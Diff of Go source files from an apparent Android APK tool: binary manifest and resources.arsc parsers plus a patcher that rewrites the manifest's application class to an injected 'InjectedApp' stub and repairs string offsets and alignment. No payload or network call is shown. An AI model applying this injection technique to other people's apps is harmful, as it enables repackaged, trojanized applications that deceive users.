if err != nil {
|
||||
return fmt.Errorf("error decoding name: %s", err.Error())
|
||||
}
|
||||
|
||||
tok := xml.StartElement{
|
||||
Name: xml.Name{Local: name, Space: namespace},
|
||||
}
|
||||
|
||||
var attrData [attrValuesCount]uint32
|
||||
for i := uint32(0); i < attrCnt; i++ {
|
||||
if err := binary.Read(r, binary.LittleEndian, &attrData); err != nil {
|
||||
return fmt.Errorf("error reading attrData: %s", err.Error())
|
||||
}
|
||||
|
||||
// Android actually reads attributes purely by their IDs (see frameworks/base/core/res/res/values/attrs_manifest.xml
|
||||
// and its generated R class, that's where the indexes come from, namely the AndroidManifestActivity array)
|
||||
// but good guy android actually puts the strings into the string table on the same indexes anyway, most of the time.
|
||||
// This is for the samples that don't have it, mostly due to obfuscators/minimizers.
|
||||
// The ID can't change, because it would break current APKs.
|
||||
// Sample: 98d2e837b8f3ac41e74b86b2d532972955e5352197a893206ecd9650f678ae31
|
||||
//
|
||||
// The exception to this rule is the "package" attribute in the root manifest tag. That one MUST NOT use
|
||||
// resource ids, instead, it needs to use the string table. The meta attrs 'platformBuildVersion*'
|
||||
// are the same, except Android never parses them so it's just for manual analysis.
|
||||
// Sample: a3ee88cf1492237a1be846df824f9de30a6f779973fe3c41c7d7ed0be644ba37
|
||||
//
|
||||
// In general, android doesn't care about namespaces, but if a resource ID is used, it has to have been
|
||||
// in the android: namespace, so we fix that up.
|
||||
|
||||
// frameworks/base/core/jni/android_util_AssetManager.cpp android_content_AssetManager_retrieveAttributes
|
||||
// frameworks/base/core/java/android/content/pm/PackageParser.java parsePackageSplitNames
|
||||
var attrName string
|
||||
if attrData[attrIdxName] < uint32(len(x.resourceIds)) {
|
||||
attrName = getAttributteName(x.resourceIds[attrData[attrIdxName]])
|
||||
}
|
||||
|
||||
var attrNameFromStrings string
|
||||
if attrName == "" || name == "manifest" {
|
||||
attrNameFromStrings, err = x.strings.get(attrData[attrIdxName])
|
||||
if err != nil {
|
||||
if attrName == "" {
|
||||
return fmt.Errorf("error decoding attrNameIdx: %s", err.Error())
|
||||
}
|
||||
} else if attrName != "" && attrNameFromStrings != "package" && !strings.HasPrefix(attrNameFromStrings, "platformBuildVersion") {
|
||||
attrNameFromStrings = ""
|
||||
}
|
||||
}
|
||||
|
||||
attrNameSpace, err := x.strings.get(attrData[attrIdxNamespace])
|
||||
if err != nil {
|
||||
return fmt.Errorf("error decoding attrNamespaceIdx: %s", err.Error())
|
||||
}
|
||||
|
||||
if attrNameFromStrings != "" {
|
||||
attrName = attrNameFromStrings
|
||||
} else if attrNameSpace == "" {
|
||||
attrNameSpace = "http://schemas.android.com/apk/res/android"
|
||||
}
|
||||
|
||||
attr := xml.Attr{
|
||||
Name: xml.Name{Local: attrName, Space: attrNameSpace},
|
||||
}
|
||||
|
||||
switch attrData[attrIdxType] >> 24 {
|
||||
case AttrTypeString:
|
||||
attr.Value, err = x.strings.get(attrData[attrIdxString])
|
||||
if err != nil {
|
||||
return fmt.Errorf("error decoding attrStringIdx: %s", err.Error())
|
||||
}
|
||||
case AttrTypeIntBool:
|
||||
attr.Value = strconv.FormatBool(attrData[attrIdxData] != 0)
|
||||
case AttrTypeIntHex:
|
||||
attr.Value = fmt.Sprintf("0x%x", attrData[attrIdxData])
|
||||
case AttrTypeFloat:
|
||||
val := (*float32)(unsafe.Pointer(&attrData[attrIdxData]))
|
||||
attr.Value = fmt.Sprintf("%g", *val)
|
||||
case AttrTypeReference:
|
||||
isValidString := false
|
||||
if x.res != nil {
|
||||
var e *ResourceEntry
|
||||
if attr.Name.Local == "icon" || attr.Name.Local == "roundIcon" {
|
||||
e, err = x.res.GetIconPng(attrData[attrIdxData])
|
||||
} else {
|
||||
e, err = x.res.GetResourceEntry(attrData[attrIdxData])
|
||||
}
|
||||
|
||||
if err == nil {
|
||||
attr.Value, err = e.value.String()
|
||||
isValidString = err == nil
|
||||
}
|
||||
}
|
||||
|
||||
if !isValidString && attr.Value == "" {
|
||||
attr.Value = fmt.Sprintf("@%x", attrData[attrIdxData])
|
||||
}
|
||||
default:
|
||||
attr.Value = strconv.FormatInt(int64(int32(attrData[attrIdxData])), 10)
|
||||
}
|
||||
tok.Attr = append(tok.Attr, attr)
|
||||
}
|
||||
|
||||
return x.encoder.EncodeToken(tok)
|
||||
}
|
||||
|
||||
func (x *binxmlParseInfo) parseTagEnd(r *io.LimitedReader) error {
|
||||
var namespaceIdx, nameIdx uint32
|
||||
if err := binary.Read(r, binary.LittleEndian, &namespaceIdx); err != nil {
|
||||
return fmt.Errorf("error reading namespace idx: %s", err.Error())
|
||||
}
|
||||
|
||||
if err := binary.Read(r, binary.LittleEndian, &nameIdx); err != nil {
|
||||
return fmt.Errorf("error reading name idx: %s", err.Error())
|
||||
}
|
||||
|
||||
namespace, err := x.strings.get(namespaceIdx)
|
||||
if err != nil {
|
||||
return fmt.Errorf("error decoding namespace: %s", err.Error())
|
||||
}
|
||||
|
||||
name, err := x.strings.get(nameIdx)
|
||||
if err != nil {
|
||||
return fmt.Errorf("error decoding name: %s", err.Error())
|
||||
}
|
||||
|
||||
return x.encoder.EncodeToken(xml.EndElement{Name: xml.Name{Local: name, Space: namespace}})
|
||||
}
|
||||
|
||||
func (x *binxmlParseInfo) parseText(r *io.LimitedReader) error {
|
||||
var idx uint32
|
||||
if err := binary.Read(r, binary.LittleEndian, &idx); err != nil {
|
||||
return fmt.Errorf("error reading idx: %s", err.Error())
|
||||
}
|
||||
|
||||
text, err := x.strings.get(idx)
|
||||
if err != nil {
|
||||
return fmt.Errorf("error decoding idx: %s", err.Error())
|
||||
}
|
||||
|
||||
if _, err := io.CopyN(ioutil.Discard, r, 2*4); err != nil {
|
||||
return fmt.Errorf("error skipping: %s", err.Error())
|
||||
}
|
||||
|
||||
return x.encoder.EncodeToken(xml.CharData(text))
|
||||
}
|
|
@ -0,0 +1,67 @@
|
|||
package manifest
|
||||
|
||||
import (
|
||||
"encoding/binary"
|
||||
"io"
|
||||
)
|
||||
|
||||
const (
|
||||
chunkNull = 0x0000
|
||||
chunkStringTable = 0x0001
|
||||
chunkTable = 0x0002
|
||||
chunkAxmlFile = 0x0003
|
||||
chunkResourceIds = 0x0180
|
||||
chunkTablePackage = 0x0200
|
||||
chunkTableType = 0x0201
|
||||
chunkTableTypeSpec = 0x0202
|
||||
chunkTableLibrary = 0x0203
|
||||
|
||||
chunkMaskXml = 0x0100
|
||||
chunkXmlNsStart = 0x0100
|
||||
chunkXmlNsEnd = 0x0101
|
||||
chunkXmlTagStart = 0x0102
|
||||
chunkXmlTagEnd = 0x0103
|
||||
chunkXmlText = 0x0104
|
||||
|
||||
attrIdxNamespace = 0
|
||||
attrIdxName = 1
|
||||
attrIdxString = 2
|
||||
attrIdxType = 3
|
||||
attrIdxData = 4
|
||||
attrValuesCount = 5
|
||||
|
||||
chunkHeaderSize = (2 + 2 + 4)
|
||||
)
|
||||
|
||||
type AttrType uint8
|
||||
|
||||
const (
|
||||
AttrTypeNull AttrType = 0x00
|
||||
AttrTypeReference = 0x01
|
||||
AttrTypeAttribute = 0x02
|
||||
AttrTypeString = 0x03
|
||||
AttrTypeFloat = 0x04
|
||||
AttrTypeIntDec = 0x10
|
||||
AttrTypeIntHex = 0x11
|
||||
AttrTypeIntBool = 0x12
|
||||
AttrTypeIntColorArgb8 = 0x1c
|
||||
AttrTypeIntColorRgb8 = 0x1d
|
||||
AttrTypeIntColorArgb4 = 0x1e
|
||||
AttrTypeIntColorRgb4 = 0x1f
|
||||
)
|
||||
|
||||
func parseChunkHeader(r io.Reader) (id, headerLen uint16, len uint32, err error) {
|
||||
if err = binary.Read(r, binary.LittleEndian, &id); err != nil { // id
|
||||
|
||||
return
|
||||
}
|
||||
|
||||
if err = binary.Read(r, binary.LittleEndian, &headerLen); err != nil { //header
|
||||
return
|
||||
}
|
||||
|
||||
if err = binary.Read(r, binary.LittleEndian, &len); err != nil {
|
||||
return
|
||||
}
|
||||
return
|
||||
}
|
|
@ -0,0 +1,16 @@
|
|||
package manifest
|
||||
|
||||
import (
|
||||
"encoding/xml"
|
||||
"errors"
|
||||
)
|
||||
|
||||
// Return this error from EncodeToken to tell apkparser to finish parsing,
|
||||
// to be used when you found the value you care about and don't need the rest.
|
||||
var ErrEndParsing = errors.New("end manifest parsing")
|
||||
|
||||
// Encoder for writing the XML data. For example Encoder from encoding/xml matches this interface.
|
||||
type ManifestEncoder interface {
|
||||
EncodeToken(t xml.Token) error
|
||||
Flush() error
|
||||
}
|
|
@ -0,0 +1,300 @@
|
|||
package manifest
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"common"
|
||||
"encoding/binary"
|
||||
"encoding/xml"
|
||||
"golang.org/x/text/encoding/unicode"
|
||||
"io/ioutil"
|
||||
"log"
|
||||
"path/filepath"
|
||||
)
|
||||
|
||||
const (
|
||||
fileLenOffset = 0x4
|
||||
offsetTableOffset = 0x24
|
||||
offsetStringTableLen = 0xc
|
||||
stringTableInfoSizeOffset = 0x1c
|
||||
|
||||
// Name of application in our stub dex
|
||||
// It is MUST be longer than any average name
|
||||
newAppNameUTF8 = "aaaaaaaa.aaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa.InjectedApp"
|
||||
newAppNameUTF8Len = uint8(len(newAppNameUTF8))
|
||||
)
|
||||
|
||||
var alignCount uint32
|
||||
var oldAppNameUTF16 string
|
||||
var newAppNameUTF16 string
|
||||
var OldAppNameUTF8 string
|
||||
var PlainPath, _ = filepath.Abs("AndroidManifest_plaintext.xml")
|
||||
|
||||
func patchApplication() ([]byte, int) {
|
||||
|
||||
log.Printf("Getting original application name...")
|
||||
OldAppNameUTF8 = getAppName()
|
||||
log.Printf("Original applciation name = %s\n", OldAppNameUTF8)
|
||||
|
||||
if OldAppNameUTF8 == "" {
|
||||
log.Panic("Application name wasn't found")
|
||||
//TODO if not found - we should add our
|
||||
}
|
||||
|
||||
// read bytes from binary xml
|
||||
androidManifestRaw, err := ioutil.ReadFile(common.ManifestBinaryPath)
|
||||
if err != nil {
|
||||
log.Panicf("Failed to read %s", common.ManifestBinaryPath)
|
||||
}
|
||||
|
||||
log.Printf("Original manifest (binary) size = 0x%0x\n", len(androidManifestRaw))
|
||||
|
||||
// encode name to UTF-16
|
||||
encoder := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder()
|
||||
oldAppNameUTF16, err = encoder.String(OldAppNameUTF8)
|
||||
|
||||
// searching application name position in binary manifest
|
||||
pos := bytes.Index(androidManifestRaw, []byte(oldAppNameUTF16))
|
||||
|
||||
//get lenght of string
|
||||
originalLen := int(androidManifestRaw[pos-2]) * 2
|
||||
|
||||
log.Printf("pos = 0x%0x, original applciation name length = 0x%0x\n", pos, originalLen)
|
||||
|
||||
//patch length with new value. length = characters count
|
||||
// pos-2 - because every string is followed by len
|
||||
androidManifestRaw[pos-2] = newAppNameUTF8Len
|
||||
|
||||
//patch application name with new name
|
||||
// do not forget about alignment!
|
||||
newAppNameUTF16, err = encoder.String(newAppNameUTF8)
|
||||
newAppNameUTF16Len := len(newAppNameUTF16)
|
||||
|
||||
// how many bytes we add to manifest
|
||||
lenDiff := newAppNameUTF16Len - originalLen
|
||||
|
||||
//// we need enough space to insert our name
|
||||
androidManifestRawNew := make([]byte, len(androidManifestRaw)+newAppNameUTF16Len-originalLen)
|
||||
|
||||
log.Printf("new applciation name = %s, new application length = 0x%0x\n",
|
||||
newAppNameUTF8, newAppNameUTF16Len)
|
||||
|
||||
// copy everything until application name string
|
||||
copy(androidManifestRawNew, androidManifestRaw[:pos])
|
||||
|
||||
// copy our name
|
||||
copy(androidManifestRawNew[pos:], []byte(newAppNameUTF16))
|
||||
|
||||
// copy everything after name
|
||||
copy(androidManifestRawNew[pos+len([]byte(newAppNameUTF16)):], androidManifestRaw[pos+originalLen:])
|
||||
|
||||
// calc position where we should insert alignment bytes
|
||||
alignPos := (newAppNameUTF16Len - originalLen) + StringTableEndPos
|
||||
|
||||
log.Printf("alignPos = 0x%0x\n", alignPos)
|
||||
|
||||
// how many bytes we should insert?
|
||||
// The main idea - data after string table should be
|
||||
// aligned to 4 bytes
|
||||
alignCount = uint32(alignPos % 4)
|
||||
|
||||
log.Printf("align = %d\n", alignCount)
|
||||
|
||||
if alignCount != 0 {
|
||||
var alignSlice = make([]byte, alignCount)
|
||||
|
||||
// insert byte alignment
|
||||
androidManifestRawNew = append(androidManifestRawNew[:alignPos], append(alignSlice, androidManifestRawNew[alignPos:]...)...)
|
||||
|
||||
}
|
||||
|
||||
return androidManifestRawNew, lenDiff
|
||||
}
|
||||
|
||||
// we should find from what offset in StringOffsets
|
||||
// we should start changing offsets by incrementing them to
|
||||
// number of characters application name expanded
|
||||
// manifest_strings.dmp contains all strings
|
||||
// we should count strings after application name
|
||||
// it will be position of offset
|
||||
|
||||
func getAppNameOffset() uint32 {
|
||||
|
||||
// position in string offset
|
||||
//var appNameOff uint32 = 1
|
||||
var pos uint32
|
||||
|
||||
data, err := ioutil.ReadFile(ManifestStringsDmp)
|
||||
if err != nil {
|
||||
panic(err)
|
||||
}
|
||||
|
||||
// searching application name position in string dump
|
||||
// we substract 2 because real offset is the offset to strLen + str
|
||||
// but we found offset to just str
|
||||
pos = uint32(bytes.Index(data, []byte(oldAppNameUTF16)) - 2)
|
||||
|
||||
log.Printf("application name position in string dump = 0x%x", pos)
|
||||
|
||||
return pos
|
||||
}
|
||||
|
||||
func patchOffsetTable(data []byte, appNameOff, lenDiff uint32) {
|
||||
|
||||
var offset uint32
|
||||
|
||||
offsetTableReader := bytes.NewReader(data)
|
||||
|
||||
var j uint32 = 0
|
||||
for i := uint32(1); i <= StringCnt - appNameOff; i++ {
|
||||
|
||||
//read offset
|
||||
err := binary.Read(offsetTableReader, binary.LittleEndian, &offset)
|
||||
if err != nil {
|
||||
log.Panic("Failed to read offset", err)
|
||||
}
|
||||
|
||||
log.Printf("Original offset = 0x%x", offset)
|
||||
|
||||
//increment it to length of symbol added
|
||||
offset += lenDiff
|
||||
|
||||
log.Printf("New offset = 0x%x", offset)
|
||||
|
||||
binary.LittleEndian.PutUint32(data[j:], offset)
|
||||
j += 4
|
||||
}
|
||||
}
|
||||
|
||||
func patchStringTableLen(data []byte) {
|
||||
|
||||
var stringTableLen uint32
|
||||
|
||||
stringTableLenReader := bytes.NewReader(data)
|
||||
|
||||
err := binary.Read(stringTableLenReader, binary.LittleEndian, &stringTableLen)
|
||||
if err != nil {
|
||||
log.Panic("Failed to read offset", err)
|
||||
}
|
||||
|
||||
// calc how many bytes we added to manifest
|
||||
// it's a difference between new name and old name
|
||||
// *2 - because they are in UTF-16
|
||||
// IMPORTANT! stringTableLen - must be 4 byte aligned
|
||||
newLen := len(newAppNameUTF16)
|
||||
oldLen := len(oldAppNameUTF16)
|
||||
stringTableLenNew := uint32(int(stringTableLen) + newLen - oldLen)
|
||||
|
||||
// align
|
||||
stringTableLenNew += alignCount
|
||||
|
||||
binary.LittleEndian.PutUint32(data, stringTableLenNew)
|
||||
}
|
||||
|
||||
func Patch() {
|
||||
|
||||
var androidManifestRaw, lenDiff = patchApplication()
|
||||
|
||||
log.Printf("New manifest len = 0x%0x\n", len(androidManifestRaw))
|
||||
|
||||
// after we insert new application name we need to increase length of manifest len
|
||||
binary.LittleEndian.PutUint32(androidManifestRaw[fileLenOffset:], uint32(len(androidManifestRaw)))
|
||||
|
||||
var appNameOff = getAppNameOffset()
|
||||
|
||||
// search offset in manifest
|
||||
appNameOffArr := make([]byte, 4)
|
||||
binary.LittleEndian.PutUint32(appNameOffArr, appNameOff)
|
||||
|
||||
pos := uint32(bytes.Index(androidManifestRaw, appNameOffArr))
|
||||
|
||||
log.Printf("application name offset in manifest = 0x%x", pos)
|
||||
|
||||
// we step to next offset after our found app name offset
|
||||
pos += 4
|
||||
|
||||
// locate the end of stringTableOffset (equals to the start of strings)
|
||||
var stringTableInfoSize uint32
|
||||
var stringOffsetTableEnd uint32
|
||||
|
||||
stringTableInfoSizeReader := bytes.NewReader(androidManifestRaw[stringTableInfoSizeOffset:])
|
||||
|
||||
err := binary.Read(stringTableInfoSizeReader, binary.LittleEndian, &stringTableInfoSize)
|
||||
if err != nil {
|
||||
log.Panic("Failed to read offset", err)
|
||||
}
|
||||
|
||||
log.Printf("stringTableInfoSize = 0x%x", stringTableInfoSize)
|
||||
|
||||
// 0x8 - start of StringTableInfo section
|
||||
stringOffsetTableEnd = 0x8 + stringTableInfoSize
|
||||
|
||||
log.Printf("stringOffsetTableEnd = 0x%x", stringOffsetTableEnd)
|
||||
|
||||
//start reading & patching
|
||||
offsetTableReader := bytes.NewReader(androidManifestRaw[pos:])
|
||||
|
||||
var j = pos
|
||||
var offset uint32
|
||||
for i := pos; i < stringOffsetTableEnd; {
|
||||
|
||||
//read offset
|
||||
err := binary.Read(offsetTableReader, binary.LittleEndian, &offset)
|
||||
if err != nil {
|
||||
log.Panic("Failed to read offset", err)
|
||||
}
|
||||
|
||||
//log.Printf("Original offset = 0x%x", offset)
|
||||
|
||||
//increment it to length of symbol added
|
||||
offset += uint32(lenDiff)
|
||||
|
||||
//log.Printf("New offset = 0x%x", offset)
|
||||
|
||||
//patch with new value
|
||||
binary.LittleEndian.PutUint32(androidManifestRaw[j:], offset)
|
||||
j += 4
|
||||
i += 4
|
||||
}
|
||||
|
||||
patchStringTableLen(androidManifestRaw[offsetStringTableLen:])
|
||||
|
||||
common.WriteChanges(androidManifestRaw, common.ManifestBinaryPath)
|
||||
}
|
||||
|
||||
// Search application name in decoded android manifest
|
||||
func getAppName() string {
|
||||
|
||||
// read manifest to byte array
|
||||
content, err := ioutil.ReadFile(PlainPath)
|
||||
if err != nil {
|
||||
panic(err)
|
||||
}
|
||||
|
||||
//defer func() {
|
||||
// err = os.Remove(manifestPlainPath)
|
||||
//
|
||||
// if err != nil {
|
||||
// panic(err)
|
||||
// }
|
||||
//} ()
|
||||
|
||||
// structs for XML nodes
|
||||
type Application struct {
|
||||
Name string `xml:"name,attr"`
|
||||
}
|
||||
|
||||
type Result struct {
|
||||
XMLName xml.Name `xml:"manifest"`
|
||||
Application Application `xml:"application"`
|
||||
}
|
||||
|
||||
v := new(Result)
|
||||
|
||||
err = xml.Unmarshal(content, v)
|
||||
if err != nil {
|
||||
log.Panic("Failed to unmarshal XML", err)
|
||||
return ""
|
||||
}
|
||||
|
||||
return v.Application.Name
|
||||
}
|
|
@ -0,0 +1,682 @@
|
|||
package manifest
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/binary"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"log"
|
||||
"math"
|
||||
"strings"
|
||||
"unicode/utf16"
|
||||
)
|
||||
|
||||
var ErrUnknownResourceDataType = errors.New("Unknown resource data type")
|
||||
|
||||
// Contains parsed resources.arsc file.
|
||||
type ResourceTable struct {
|
||||
mainStrings stringTable
|
||||
nextPackageId uint32
|
||||
packages map[uint32]*packageGroup
|
||||
}
|
||||
|
||||
type packageGroup struct {
|
||||
Name string
|
||||
Id uint32
|
||||
Packages []*resourcePackage
|
||||
|
||||
table *ResourceTable
|
||||
largestTypeId uint8
|
||||
types map[uint8][]resourceTypeSpec
|
||||
}
|
||||
|
||||
type resourcePackage struct {
|
||||
Id uint32
|
||||
Name string
|
||||
|
||||
typeIdOffset uint32
|
||||
typeStrings stringTable
|
||||
keyStrings stringTable
|
||||
}
|
||||
|
||||
type resourceTypeSpec struct {
|
||||
Id uint8
|
||||
Entries []uint32
|
||||
Package *resourcePackage
|
||||
|
||||
Configs []*resourceType
|
||||
}
|
||||
|
||||
type resourceType struct {
|
||||
chunkData []byte
|
||||
entryCount uint32
|
||||
entriesStart uint32
|
||||
indexesStart uint32
|
||||
|
||||
// ResTable_config config;
|
||||
}
|
||||
|
||||
const (
|
||||
tableEntryComplex = 0x0001
|
||||
tableEntryPublic = 0x0002
|
||||
tableEntryWeak = 0x0004
|
||||
)
|
||||
|
||||
// Describes one resource entry, for example @drawable/icon in the original XML, in one particular config option.
|
||||
type ResourceEntry struct {
|
||||
size uint16
|
||||
flags uint16
|
||||
|
||||
ResourceType string
|
||||
Key string
|
||||
Package string
|
||||
|
||||
value ResourceValue
|
||||
}
|
||||
|
||||
// Handle to the resource's actual value.
|
||||
type ResourceValue struct {
|
||||
dataType AttrType
|
||||
data uint32
|
||||
|
||||
globalStringTable *stringTable
|
||||
convertedData interface{}
|
||||
}
|
||||
|
||||
// Resource config option to pick from options - when @drawable/icon is referenced,
|
||||
// use /res/drawable-xhdpi/icon.png or use /res/drawable-mdpi/icon.png?
|
||||
//
|
||||
// This is not fully implemented, so you can pick only first seen or last seen option.
|
||||
type ResourceConfigOption int
|
||||
|
||||
const (
|
||||
ConfigFirst ResourceConfigOption = iota // Usually the smallest
|
||||
ConfigLast // Usually the biggest
|
||||
|
||||
// Try to find the biggest png icon, otherwise same as ConfigLast.
|
||||
//
|
||||
// Deprecated: use GetIconPng
|
||||
ConfigPngIcon
|
||||
)
|
||||
|
||||
// Parses the resources.arsc file
|
||||
func ParseResourceTable(r io.Reader) *ResourceTable {
|
||||
res := ResourceTable{
|
||||
nextPackageId: 2,
|
||||
packages: make(map[uint32]*packageGroup),
|
||||
}
|
||||
|
||||
id, hdrLen, totalLen, err := parseChunkHeader(r)
|
||||
if err != nil {
|
||||
log.Panic("parseChunkHeader() failed", err)
|
||||
}
|
||||
|
||||
var packageCurrent, packagesCnt uint32
|
||||
if err = binary.Read(r, binary.LittleEndian, &packagesCnt); err != nil {
|
||||
log.Panic("Failed to read packagesCnt", err)
|
||||
}
|
||||
|
||||
if hdrLen < chunkHeaderSize+4 {
|
||||
log.Panicf("Invalid header length: %d", hdrLen)
|
||||
}
|
||||
|
||||
totalLen -= uint32(hdrLen)
|
||||
hdrLen -= chunkHeaderSize + 4
|
||||
|
||||
if _, err = io.CopyN(ioutil.Discard, r, int64(hdrLen)); err != nil {
|
||||
log.Panic("Failed to read header padding: %s", err.Error())
|
||||
}
|
||||
|
||||
var len uint32
|
||||
var lastId uint16
|
||||
for i := uint32(0); i < totalLen; i += len {
|
||||
id, hdrLen, len, err = parseChunkHeader(r)
|
||||
if err != nil {
|
||||
log.Panicf("Error parsing header at 0x%08x of 0x%08x %08x: %s", i, totalLen, lastId, err.Error())
|
||||
}
|
||||
|
||||
lastId = id
|
||||
|
||||
lm := &io.LimitedReader{R: r, N: int64(len) - chunkHeaderSize}
|
||||
|
||||
switch id {
|
||||
case chunkStringTable:
|
||||
if res.mainStrings.isEmpty() {
|
||||
res.mainStrings, err = parseStringTable(lm)
|
||||
}
|
||||
case chunkTablePackage:
|
||||
if packageCurrent >= packagesCnt {
|
||||
log.Panicf("Chunk: 0x%08x: Too many package chunks", id)
|
||||
}
|
||||
|
||||
err = res.parsePackage(lm, hdrLen)
|
||||
packageCurrent++
|
||||
default:
|
||||
err = fmt.Errorf("Unknown chunk: 0x%08x at %d.", id, i+chunkHeaderSize+4)
|
||||
//_, err = io.CopyN(ioutil.Discard, lm, lm.N)
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
log.Panicf("Chunk: 0x%08x: %s", id, err.Error())
|
||||
} else if lm.N != 0 {
|
||||
log.Panicf("Chunk: 0x%08x: was not fully read", id)
|
||||
}
|
||||
}
|
||||
return &res
|
||||
}
|
||||
|
||||
func (x *ResourceTable) parsePackage(r *io.LimitedReader, hdrLen uint16) error {
|
||||
pkgBlock, err := ioutil.ReadAll(r)
|
||||
if err != nil {
|
||||
return fmt.Errorf("error reading package block: %s", err.Error())
|
||||
}
|
||||
|
||||
pkgReader := bytes.NewReader(pkgBlock)
|
||||
|
||||
const valsSize = chunkHeaderSize + 4 + 2*128 + 4*5
|
||||
vals := struct {
|
||||
Id uint32
|
||||
Name [128]uint16
|
||||
TypeStrings uint32
|
||||
LastPublicType uint32
|
||||
KeyStrings uint32
|
||||
LastPublicKey uint32
|
||||
TypeIdOffset uint32
|
||||
}{}
|
||||
|
||||
if err := binary.Read(pkgReader, binary.LittleEndian, &vals); err != nil {
|
||||
return fmt.Errorf("error reading values: %s", err.Error())
|
||||
}
|
||||
|
||||
if vals.Id >= 256 {
|
||||
return fmt.Errorf("package id out of range: %d", vals.Id)
|
||||
}
|
||||
|
||||
if vals.Id == 0 {
|
||||
vals.Id = x.nextPackageId
|
||||
x.nextPackageId++
|
||||
}
|
||||
|
||||
pkg := &resourcePackage{
|
||||
Id: vals.Id,
|
||||
}
|
||||
|
||||
// TypeIdOffset was added later and may not be present (frameworks/base@f90f2f8dc36e7243b85e0b6a7fd5a590893c827e)
|
||||
if hdrLen >= valsSize {
|
||||
pkg.typeIdOffset = vals.TypeIdOffset
|
||||
}
|
||||
|
||||
pkg.Name = string(utf16.Decode(vals.Name[:]))
|
||||
if idx := strings.IndexRune(pkg.Name, 0); idx != -1 {
|
||||
pkg.Name = pkg.Name[:idx]
|
||||
}
|
||||
|
||||
if vals.TypeStrings < chunkHeaderSize || vals.KeyStrings <= chunkHeaderSize {
|
||||
return fmt.Errorf("Invalid strings offset: %d %d", vals.TypeStrings, vals.KeyStrings)
|
||||
}
|
||||
|
||||
vals.TypeStrings -= chunkHeaderSize
|
||||
vals.KeyStrings -= chunkHeaderSize
|
||||
|
||||
if _, err := pkgReader.Seek(int64(vals.TypeStrings), io.SeekStart); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
if pkg.typeStrings, err = parseStringTableWithChunk(pkgReader); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
if _, err := pkgReader.Seek(int64(vals.KeyStrings), io.SeekStart); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
if pkg.keyStrings, err = parseStringTableWithChunk(pkgReader); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
group, prs := x.packages[pkg.Id]
|
||||
if !prs {
|
||||
group = &packageGroup{
|
||||
Id: pkg.Id,
|
||||
Name: pkg.Name,
|
||||
table: x,
|
||||
types: make(map[uint8][]resourceTypeSpec),
|
||||
}
|
||||
x.packages[pkg.Id] = group
|
||||
|
||||
/*
|
||||
// Find all packages that reference this package
|
||||
size_t N = mpackageGroups.size();
|
||||
for (size_t i = 0; i < N; i++) {
|
||||
mpackageGroups[i]->dynamicRefTable.addMapping(
|
||||
group->name, static_cast<uint8_t>(group->id));
|
||||
}
|
||||
*/
|
||||
}
|
||||
|
||||
group.Packages = append(group.Packages, pkg)
|
||||
|
||||
if _, err := pkgReader.Seek(int64(hdrLen-chunkHeaderSize), io.SeekStart); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
for {
|
||||
chunkStartOffset, _ := pkgReader.Seek(0, io.SeekCurrent)
|
||||
|
||||
id, hdrLen, totalLen, err := parseChunkHeader(pkgReader)
|
||||
if err == io.EOF {
|
||||
break
|
||||
} else if err != nil {
|
||||
return fmt.Errorf("Error parsing package internal header: %s", err.Error())
|
||||
}
|
||||
|
||||
// Sample: 7e97541191621e72bd794b5b2d60eb2f68669ea8782421e54ec719ccda06c8a4
|
||||
if chunkStartOffset+int64(totalLen) >= int64(len(pkgBlock)) {
|
||||
totalLen = uint32(int64(len(pkgBlock)) - chunkStartOffset)
|
||||
}
|
||||
|
||||
lm := &io.LimitedReader{R: pkgReader, N: int64(totalLen) - chunkHeaderSize}
|
||||
|
||||
switch id {
|
||||
case chunkTableTypeSpec:
|
||||
err = x.parseTypeSpec(lm, pkg, group)
|
||||
case chunkTableType:
|
||||
block := pkgBlock[chunkStartOffset : chunkStartOffset+int64(totalLen)]
|
||||
if err = x.parseType(lm, pkg, group, block, hdrLen); err != nil {
|
||||
break
|
||||
}
|
||||
fallthrough
|
||||
default:
|
||||
_, err = io.CopyN(ioutil.Discard, lm, lm.N)
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
return fmt.Errorf("Chunk: 0x%08x: %s", id, err.Error())
|
||||
} else if lm.N != 0 {
|
||||
return fmt.Errorf("Chunk: 0x%08x: was not fully read", id)
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (x *ResourceTable) parseTypeSpec(r io.Reader, pkg *resourcePackage, group *packageGroup) error {
|
||||
var id uint8
|
||||
if err := binary.Read(r, binary.LittleEndian, &id); err != nil {
|
||||
return fmt.Errorf("Failed to read type spec id: %s", err.Error())
|
||||
}
|
||||
|
||||
if id == 0 {
|
||||
return fmt.Errorf("Invalid type spec id: %d", id)
|
||||
}
|
||||
|
||||
if _, err := io.CopyN(ioutil.Discard, r, 1+2); err != nil {
|
||||
return fmt.Errorf("Failed to skip padding: %s", err.Error())
|
||||
}
|
||||
|
||||
var entryCount uint32
|
||||
if err := binary.Read(r, binary.LittleEndian, &entryCount); err != nil {
|
||||
return fmt.Errorf("Failed to read entryCount: %s", err.Error())
|
||||
}
|
||||
|
||||
if entryCount > 0 {
|
||||
var entries []uint32
|
||||
for i := uint32(0); i < entryCount; i++ {
|
||||
var e uint32
|
||||
if err := binary.Read(r, binary.LittleEndian, &e); err != nil {
|
||||
return fmt.Errorf("Failed to read type spec entry: %s", err.Error())
|
||||
}
|
||||
entries = append(entries, e)
|
||||
}
|
||||
|
||||
group.types[id] = append(group.types[id], resourceTypeSpec{
|
||||
Id: id,
|
||||
Entries: entries,
|
||||
Package: pkg,
|
||||
})
|
||||
|
||||
if id > group.largestTypeId {
|
||||
group.largestTypeId = id
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (x *ResourceTable) parseType(r io.Reader, pkg *resourcePackage, group *packageGroup, chunkData []byte, hdrLen uint16) error {
|
||||
vals := struct {
|
||||
Id uint8
|
||||
Res0 uint8
|
